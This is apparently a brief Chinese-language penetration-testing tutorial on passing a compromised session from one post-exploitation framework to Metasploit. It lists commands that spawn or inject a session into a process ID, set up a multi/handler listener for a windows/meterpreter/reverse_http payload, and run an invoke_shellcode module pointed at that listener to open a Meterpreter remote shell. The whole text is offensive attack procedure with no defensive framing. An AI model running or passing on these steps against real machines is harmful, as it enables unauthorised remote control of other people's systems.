spawn设置监听器
选择好会话,直接spawn 监听器名就能直接复制一个会话
psinject 监听器 进程ID
首先用metasploit设置监听
msfconsole
使用监听模块use exploit/multi/handler
设置payload 主机 端口号
set payload windows/meterpreter/reverse_http
set lhost 192.168.0.125
set lport 4444
后台执行exploit -j
code_execution/invoke_shellcode
这个模块 Lhost设置metasploit的ip地址 lport 设置的端口
payloady 跟metasploit 相对应。
接下来就可以使用meterpreter进行渗透。
——————————————————————————江山代有才人出,各领风骚数百年。